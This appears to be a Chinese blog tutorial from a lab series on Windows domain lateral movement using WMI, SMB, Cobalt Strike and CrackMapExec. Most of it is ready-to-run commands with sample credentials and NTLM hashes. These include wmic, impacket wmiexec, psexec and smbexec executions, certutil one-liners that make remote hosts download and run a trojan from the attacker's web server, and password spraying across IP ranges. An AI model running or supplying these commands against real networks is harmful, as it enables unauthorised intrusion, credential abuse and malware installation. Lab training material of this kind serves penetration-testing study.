这里这个环境继续上一篇文章搭建的环境

案例一： 域横向移动-WMI-自带&命令&套件&插件

首先上线win2008

首先提权到system权限

wmic是windows自带的命令，可以通过135端口进行连接利用，只支持明文方式，优点是不用上传别的东西，缺点是无回显。

利用system权限抓取明文密码和hash密码

直接获得了域控管理员的账号密码

探测存活主机 

进一步的信息收集上一篇文章写过

win2008开启监听并生成木马上传到本地web服务器

wmic 

利用wmic命令去连接别的主机，让目标主机去下载木马

wmic /node:目标ip /user:账号 /password:密码 process call create "执行命令"
wmic /node:192.168.3.30 /user:administrator /password:admin@123 process call create "certutil -urlcache -split -f http://192.168.3.20/2.exe 2.exe"

连接成功一般只有这种显示

成功上传

让他执行

成功上线

缺点就是没有任何回显

cscript

项目地址：https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs

特点是会反弹一个新的窗口就导致没有办法在cs当中去运行，类似反弹shell，并且得借助一个vbs文件，且不支持hash

在3.20（win2008主机）上运行

cscript //nologo wmiexec.vbs /shell 192.168.3.30 账号 密码
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator 123.com

弹过来的新窗口反弹的ip为3.30

wmiexec-impacket

下载地址

1、Py版：https://github.com/SecureAuthCorp/impacket
python atexec.py god/administrator:Admin12345@192.168.3.21 “ver”
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 “whoami”

2、Exe版：https://gitee.com/RichChigga/impacket-examples-windows

这种方式又拥有回显，又可以适配cs

生成代理节点

这里因为我是linux环境直接执行py文件，exe文件一个原理

wmiexec ./账号:密码@ip "命令"
wmiexec 域名/账号:密码@ip "命令"
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

尝试使用域控的hash进行连接

wmiexec -hashes :hash值 (域名或者.)/账号@192.168.3.40 "whoami"

执行上线

proxychains4 python wmiexec.py -hashes :afffeba176210fa/administrator@192.168.3.40 "certutil -urlcache -split -f h c:/222.exe & c:/222.exe"

案例二:  域横向移动-SMB-自带&命令&套件&插件

利用的是smb开放的445端口

命令

项目地址：PsTools - Sysinternals | Microsoft Learn

psexe也是反弹一个cmd所以不能直接在cs当中运行

windows官方用法
psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd

这里因为我是linux系统所以我直接把文件拖入win2008进行运行，并且运行该文件的时候cmd权限必须为admin，这里也可以用socks代理执行，并且权限已经是system可以执行。

20执行获得30的cmd

套件

使用套件中的psexec

wmi套件中
psexec.py ./administrator:123.com@192.168.3.30
psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.30

套件当中还有一个smbexec.py文件

python smbexec.py ./administrator:123.com@192.168.3.40 
python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator@192.168.20.30  

同样也是会弹出一个新的cmd会话

 

cs自带

先需要设置转发上线，因为内网不出网

选择域控密码，或者主机密码

域控上线

 利用psexec64+主机hash值上线win7

因为这里我所有主机都是一个密码，所以直接选这个，记得他会自动加上win2008的域，记得删除，然后就是提醒我们在内网渗透过程当中要尝试切换域内用户的登录方式，大部分会自动加上域

成功上线

案例三： 域横向移动-工具-Proxychains&CrackMapExec

这里proxychains我一直在用，不做过多介绍了

crackmapexec下载地址：（kali自带）GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks

基本用法

探测存活主机

crackmapexec smb 192.168.3.10-40 #探测存活主机

密码喷射域登录

crackmapexec smb 192.168.3.10-40 -u jie -p 123.com

这里由于我没有把密码和主机进行绑定，所以域内所有主机都可以用这个密码登录

密码喷射本地登录

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth

密码喷射本地登录加执行命令

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth -x "whoami"

尝试上线,记得设置转发上线，ip需要设置为内网ip

 利用下面的命令下载web服务器中的木马，并尝试运行上线

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com -x "certutil -urlcache -split -f http://192.168.3.20/2.exe c:/zzzzz.exe & c:/zzzzz.exe"

 除了域控主机之外都上线了，切换域控密码喷射

高阶玩法

当收集到一台域内主机以后，可以尝试把收集到的密码，用户都写入字典当中

注意收集用户的时候不能用提权的账户，需要用域内账户

这里密码我基本上都是123.com

运行，这里注意要加一个参数，不然运行一个成功匹配后就不会继续往下运行

--continue-on-success

用字典密码去匹配

这个加continue参数好像只能够匹配密码，不能全上线，不加参数的话又指挥上线一个就掉了，不太懂了，可以匹配出来密码，用账号密码，一个一个去上线？